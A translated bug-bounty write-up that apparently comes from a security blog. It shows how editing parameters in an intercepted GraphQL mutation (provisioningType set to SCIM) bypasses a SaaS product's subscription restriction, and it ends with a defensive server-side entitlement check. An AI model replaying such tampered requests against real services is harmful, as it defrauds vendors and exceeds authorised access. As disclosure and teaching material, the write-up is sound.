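Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for any other purpose bear full legal and joint liability; the author of the article assumes no legal or joint liability.
New blog domain: https://gugesay.com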
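Preface
As is well known, the management pages of many subscription products bundle a lot of functionality, such as managing usage, data, users and access.
Today's post covers a case from abroad in which a business logic flaw was used to get around a subscription's time-limit restriction. Without further ado, let's get started.
Vulnerability details
The white-hat researcher stumbled on a user-management screen with Authentication Domains. As shown below, the screen is used to create an authentication domain, rename the default one, or change its contents:
At the same time, the researcher noticed that this screen could be used to subscribe to the Pro plan:
After some testing, the researcher eventually found a way around it.
First, go to user management:
Next, click the user settings button:
Then change the value here and intercept the request:
The request shows that GraphQL is in use: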
POST /graphql HTTP/2
Host: redacted.com
Cookie: xxxxxxxxxxxxx
Content-Length: 2723
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://redacted.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"operationName":"AuthenticationDomainUpdateMutation","variables":{"includeScimConfiguration":false,"includeSamlConfiguration":false,"id":"d937a430-7593-4b86-b073-a14dcd20a229","name":"momen0x00","authenticationType":"PASSWORD","provisioningType":"MANUAL","basicFullTierChangeApproval":"ADMIN_REVIEW","coreFullTierChangeApproval":"ADMIN_REVIEW","basicCoreTierChangeApproval":"ADMIN_REVIEW","idpManagedAttributes":[],"upgradeMessage":null,"upgradeButtonText":null,"upgradeButtonTargetUrl":null,"maxBrowserSessionDuration":2592000,"maxBrowserIdleDuration":604800},"query":"mutation AuthenticationDomainUpdateMutation($id: ID!, $name: String, $currentSamlConfigurationId: String, $currentScimConfigurationId: String, $authenticationType: String, $provisioningType: String, $maxBrowserSessionDuration: Int, $maxBrowserIdleDuration: Int, $basicCoreTierChangeApproval: String, $basicFullTierChangeApproval: String, $coreFullTierChangeApproval: String, $includeScimConfiguration: Boolean = false, $includeSamlConfiguration: Boolean = false, $postUpdateActions: [PostUpdateActions], $idpManagedAttributes: [IdpManagedAttributes], $upgradeMessage: String, $upgradeButtonText: String, $upgradeButtonTargetUrl: String) {\n updateAuthenticationDomain(\n input: {id: $id, name: $name, currentSamlConfigurationId: $currentSamlConfigurationId, currentScimConfigurationId: $currentScimConfigurationId, authenticationType: $authenticationType, provisioningType: $provisioningType, maxBrowserSessionDuration: $maxBrowserSessionDuration, maxBrowserIdleDuration: $maxBrowserIdleDuration, basicCoreTierChangeApproval: $basicCoreTierChangeApproval, basicFullTierChangeApproval: $basicFullTierChangeApproval, coreFullTierChangeApproval: $coreFullTierChangeApproval, postUpdateActions: $postUpdateActions, idpManagedAttributes: $idpManagedAttributes, upgradeMessage: $upgradeMessage, upgradeButtonText: $upgradeButtonText, upgradeButtonTargetUrl: $upgradeButtonTargetUrl}\n ) {\n id\n name\n authenticationType\n provisioningType\n maxBrowserSessionDuration\n maxBrowserIdleDuration\n basicCoreTierChangeApproval\n basicFullTierChangeApproval\n coreFullTierChangeApproval\n idpManagedAttributes\n upgradeMessage\n upgradeButtonText\n upgradeButtonTargetUrl\n currentSamlConfiguration @include(if: $includeSamlConfiguration) {\n idpSsoTargetUrl\n logoutRedirectUrl\n certificate\n certificateFilename\n assertionConsumerUrl\n spEntityId\n idpEntityId\n idpMetadata\n __typename\n }\n currentScimConfiguration @include(if: $includeScimConfiguration) {\n authenticationDomainId\n createdAt\n __typename\n }\n __typename\n }\n}\n"}
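The following parameters are modified:
"name":"DEFAULT" is changed to "name":"BUG"
"provisioningType":"Manual", is changed to "provisioningType":"SCIM"
Then, after sending the request, go to the Auth Domain screen:
As you can see, the subscription restriction was successfully bypassed.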
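A server-side check that would reject the modified request, as an added example that is not from the original write-up or the affected vendor. It assumes the SCIM value of provisioningType is a paid-plan feature and that the plan is read from the account's subscription record rather than from the request; the plan names, record shape and function names are hypothetical.

```javascript
// Added example, not the vendor's code. Plan names, the subscription record
// shape and GATED_VALUES are assumptions; the provisioningType field and its
// MANUAL / SCIM values are taken from the request shown above.
const PLAN_RANK = new Map([["free", 0], ["pro", 1]]);
const GATED_VALUES = {
  provisioningType: new Map([["MANUAL", "free"], ["SCIM", "pro"]]), // value -> minimum plan
};

// Derive the plan from server-side state only, never from the request.
// An expired paid subscription falls back to "free".
function effectivePlan(subscription, now = Date.now()) {
  if (!subscription || !PLAN_RANK.has(subscription.plan)) return "free";
  if (subscription.expiresAt != null && subscription.expiresAt <= now) return "free";
  return subscription.plan;
}

// Check every gated field present in the mutation input.
// Returns a list of violations; empty means the update may proceed.
function checkEntitlements(input, subscription, now = Date.now()) {
  const plan = effectivePlan(subscription, now);
  const violations = [];
  for (const [field, allowed] of Object.entries(GATED_VALUES)) {
    const raw = input[field];
    if (raw === undefined || raw === null) continue; // field is not being changed
    const value = String(raw).toUpperCase(); // treat "Manual" and "MANUAL" alike
    const required = allowed.get(value);
    if (required === undefined) {
      violations.push({ field, value, reason: "UNKNOWN_VALUE" });
    } else if (PLAN_RANK.get(required) > PLAN_RANK.get(plan)) {
      violations.push({ field, value, reason: "PLAN_REQUIRED", required, plan });
    }
  }
  return violations;
}

// Wrap the write: deny and record the attempt before anything is stored.
function guardedUpdate(input, ctx, applyUpdate) {
  const violations = checkEntitlements(input, ctx.subscription, ctx.now);
  if (violations.length > 0) {
    ctx.audit.push({ event: "entitlement_denied", accountId: ctx.accountId, domainId: input.id, violations });
    return { ok: false, errors: violations };
  }
  return { ok: true, domain: applyUpdate(input) };
}
```

The audit entries written on denial double as a detection signal: repeated entitlement_denied events for one account indicate someone replaying edited requests.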
The above was translated and compiled by 骨哥; I hope you found it useful.
Original article: https://0xmatrix.medium.com/hacking-the-system-how-i-beat-subscription-restrictions-in-admin-controls-5684fd90279a